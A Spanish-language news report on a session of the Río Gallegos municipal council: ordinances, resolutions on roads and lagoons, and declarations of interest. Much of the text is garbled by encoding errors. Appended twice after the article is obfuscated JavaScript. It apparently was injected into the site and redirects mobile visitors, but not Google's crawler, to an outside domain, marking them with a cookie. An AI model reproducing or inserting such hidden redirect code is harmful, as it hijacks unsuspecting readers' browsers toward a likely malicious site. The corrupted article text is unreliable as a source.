Autorizaron a Giubetich a utilizar mensualmente adelantos bancarios

En el Honorable Concejo Deliberante de RAi??o Gallegos desarrollA? su 4Ai?? SesiA?n Ordinaria del perAi??odo legislativo bajo la presidencia del concejal FabiA?n LeguizamA?n, contando con la presencia de todos los ediles. Por mayorAi??a se aprobA? este proyecto de autorAi??a de Ruiz.

El Concejo Deliberante sancionA? un proyecto de ordenanza impulsado por el concejal Ruiz que autoriza al Departamento Ejecutivo Municipal a realizar mensualmente, hasta el 31 de julio de este aAi??o, un acuerdo con el Banco Santa Cruz para acceder a un sistema de adelantos que le permita afrontar los pagos de haberes de los agentes municipales. El expediente, que ingresA? fuera del orden del dAi??a y se tratA? sobre tablas tras constituir el Cuerpo en comisiA?n, fue aprobado por mayorAi??a.

DEL DEPARTAMENTO EJECUTIVO Y PARTICULARES

En la oportunidad, se conociA? el veto total del Ejecutivo Municipal al proyecto de ordenanza del concejal Evaristo Ruiz, sancionado sobre tablas en las 2A? SesiA?n Ordinaria, mediante el cual se congelA? el mA?dulo fiscal que rige para los impuestos municipales, quedando al valor vigente durante el 2017.

A su vez, ingresaron propuestas de usuarios del Transporte Colectivo de Pasajeros, que solicitan la adhesiA?n del Municipio a los beneficios y descuentos de la tarjeta SUBE, y la implementaciA?n de la aplicaciA?n ai???A quAi?? hora pasa’.

PROYECTOS DE ORDENANZA

TomA? estado parlamentario un proyecto de ordenanza del concejal LeguizamA?n que propone la seAi??alizaciA?n de entes pA?blicos con pictogramas para orientar e informar a personas con trastornos del espectro autista (TEA), trastornos generalizados del desarrollo (TGD), sAi??ndrome de Asperger, entre otros.

TambiAi??n entrA? la iniciativa del concejal RuAi??z que incorpora en el CA?digo de Faltas Municipal las sanciones por incumplimiento de la ordenanza NA? 8426 (Tenencia Responsable de Mascota), y la propuesta del Bloque Justicialista para que el Municipio adhiera a la prA?rroga de la Ley de Emergencia Comercial NA? 3548, en todo el A?mbito provincial, desde el 1A? de marzo hasta el 31 de agosto de 2018 inclusive. Por su parte, el concejal EchazA? elevA? un proyecto de ordenanza para que el Municipio suspenda, por el tAi??rmino de 180 dAi??as, el requisito del pago de deudas municipales previo a tramitar la licencia de conducir.

Entre los proyectos de ordenanza presentados por el concejal Roquel, se destacan: la propuesta de actualizaciA?n de la ordenanza que regula el trA?nsito pesado en el A?mbito local, con el fin evitar inconvenientes en su aplicaciA?n; y la iniciativa que busca declarar la castraciA?n quirA?rgica, gratuita, masiva, abarcativa, sistemA?tica y extendida como A?nico mAi??todo Ai??tico y eficiente para el control del crecimiento poblacional de animales de compaAi??Ai??a.

En todos los casos, los expedientes pasaron a estudio de las comisiones permanentes del Concejo, para su tratamiento y posterior dictamen.

PROYECTOS DE RESOLUCIAi??N

A propuesta del concejal LeguizamA?n se requiriA? a la SecretarAi??a de Obras PA?blicas y Urbanismo Municipal la colocaciA?n de tachas reflectivas, reductoras de velocidad, sobre la calle Congreso y la avenida Juan Domingo PerA?n, entre Tripulantes del Fournier y Antonio Rivero, o bien, la instalaciA?n de un semA?foro, en este A?ltimo sector.

Asimismo, por resoluciones del concejal Kingma se pidiA? al Municipio estudios de factibilidad tAi??cnica en la intersecciA?n de Pellegrini y Magallanes para la colocaciA?n de un semA?foro, arreglos en la cinta asfA?ltica de la calle Belgrano, esquina Santiago del Estero, y la restituciA?n de las garitas de colectivos que fueron removidas para su reparaciA?n. AdemA?s, por pedidos del concejal Scippo, se solicitarA? la reparaciA?n tanto del pavimento de la intersecciA?n de las calles Alvear y Chile, como de la boca de tormenta ubicada en R. A?lvarez y Adolfo B. Iglesias, y tareas de relleno y compactaciA?n en calles del barrio Vial.

Del mismo modo, a instancias del concejal EchazA? se pedirA? la colocaciA?n de seAi??ales con la leyenda PARE o CEDA EL PASO, en las intersecciones de la calle Madame Curie con JosAi?? Ortega y Gasset y con Jorge Luis Borges del barrio Evita, y los trabajos que correspondan sobre la calle 19 de Diciembre, entre Allende y Parque Industrial, para concretar la pavimentaciA?n de los tramos pendientes.

AdemA?s, se elevA? una peticiA?n a la empresa Servicios PA?blicos Sociedad del Estado para que proceda a la reparaciA?n del alumbrado pA?blico en la calle Misiones, desde la intersecciA?n de RamA?n y Cajal hasta calle Don Bosco.

Por la afirmativa, se votaron resoluciones impulsadas por el concejal EchazA? que piden informes al Municipio sobre el estado actual en que se encuentran las unidades afectadas al servicio de Transporte Colectivo de Pasajeros, y el destino que se les da a los recursos provenientes del Fondo Federal Solidario (SOJA). VotaciA?n similar obtuvo el pedido de informe elevado por el concejal Scippo para conocer los motivos por los cuales aA?n no se ha dado inicio a la obra para la construcciA?n del sistema de desagA?es pluviales de la Cuenca Sarmiento.

Otra resoluciA?n del concejal Medvedovsky, que tambiAi??n recibiA? el visto bueno del Cuerpo Legislativo, es un pedido de informe al DEM sobre los programas en materia de niAi??ez y adolescencia, y los montos promedios de inversiA?n, que de manera directa se ha distribuido en el marco del convenio 0195/17, firmado entre el Ministerio de Desarrollo Social de la Provincia de Santa Cruz y la Municipalidad.

Se unificaron proyectos de los concejales LeguizamA?n y Scippo que elevan pedidos al Ejecutivo para la realizaciA?n de diferentes acciones tendientes a la preservaciA?n de las lagunas naturales de la ciudad. De esta manera se solicitA? la seAi??alizaciA?n, cercado, limpieza y el reacondicionamiento de las lagunas Ortiz, MarAi??a La Gorda y Los Patos, y en un aspecto mA?s integral, la incorporaciA?n de estos sectores al Plan de Mejoramiento Urbano 2018. Por otro proyecto del edil Scippo se pedirA?n tareas de igual naturaleza en la laguna artificial del barrio 108 Viviendas.

En cambio, por mayorAi??a, se rechazaron dos proyectos presentados por el Bloque Justicialista que pretendAi??an dejar sin efecto resoluciones aprobadas en la 3Ai?? sesiA?n del Concejo Deliberante. Por un lado, la solicitud a la Honorable CA?mara de Diputados de Santa Cruz de acatar el pedido de desafuero del diputado MatAi??as MazA?, con el fin de que el legislador sea sometido al proceso judicial por la causa en que se lo imputa; y por otro, el repudio a las declaraciones del ministro de Gobierno de Santa Cruz, Fernando Basanta.

Por unanimidad, el Concejo Deliberante repudiA? los dichos de la seAi??ora Maria Zuvic, parlamentaria del Mercosur por Cambiemos, respecto al fallecimiento de la senadora Judith Forstmann en su libro El Origen y en diversos medios televisivos.

Por A?ltimo, se votA? positivamente y de forma unA?nime el proyecto del concejal Medvedovsky para solicitar al Ejecutivo Municipal, la pronta apertura del Teatro Municipal HAi??ctor Marinero cerrado en febrero de 2016; y por mayorAi??a, la propuesta del concejal Roquel que solicita dejar sin efecto la ResoluciA?n NA? 005/17, hasta tanto se realice un censo provincial para determinar los Ai??ndices reales de coparticaciA?n, el Bloque del PJ-FPV votA? en contra.

DESPACHO DE COMISIONES

En la ocasiA?n, se sancionaron diversos proyectos de ordenanzas, con promulgaciA?n parcial del Ejecutivo Municipal, que establecen las siguientes disposiciones: la reserva de estacionamiento para personas con movilidad reducida, frente a su domicilio, la actualizaciA?n de las penalidades por incumplimiento de la ordenanza que regula la salida y el trA?nsito de los residuos de faena, y la prohibiciA?n de instalar bA?sculas para el control de pesos y dimensiones de camiones en zonas residenciales.

TambiAi??n se sancionaron iniciativas de designaciA?n de espacios pA?blicos, entre ellos: el proyecto que nombra barrio Patagonia a un sector de la ciudad, y la propuesta para denominar ai???Parque de la Ciudad HAi??ctor, Pirincho, Roquel’ al espacio recreativo ubicado en la Costanera. A su vez, se aceptA? por unanimidad las modificaciones efectuadas por el Ejecutivo Municipales a los proyectos de nominaciA?n de calles iniciados por los concejales LeguizamA?n y Roquel.

DECLARACIONES DE INTERAi??S Y RECONOCIMIENTOS

En su 4A? sesiA?n ordinaria, el Concejo Deliberante declarA? de InterAi??s Municipal las siguientes iniciativas: la II EdiciA?n de la SA?per Liga Femenina de FA?tbol: Apertura 2018 – Homenaje a Sol Saldivia, las X Jornadas en Letras ai???Camino de Arena: Letras que trazan el tiempo’, organizadas por la UARG – UNPA, el concurso provincial ai???Nuestras Mujeres- Nuestra Historia’, impulsado por la SubsecretarAi??a de la Mujer, con motivo del dAi??a Internacional de la Mujer, y el proyecto evangelAi??stico InvasiA?n del amor de Dios organizado por el Centro Cristiano La Red.

AdemA?s,se reconociA? al Club Leones RAi??o Gallegos por la conmemoraciA?n de su 50A? aniversario que serA? el el prA?ximo 27 de abril; como a la vecina Teresa Ponce por su labor en el programa solidario de reciclado de tapitas de botellas en nuestra ciudad, impulsado por la FundaciA?n Garrahan.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}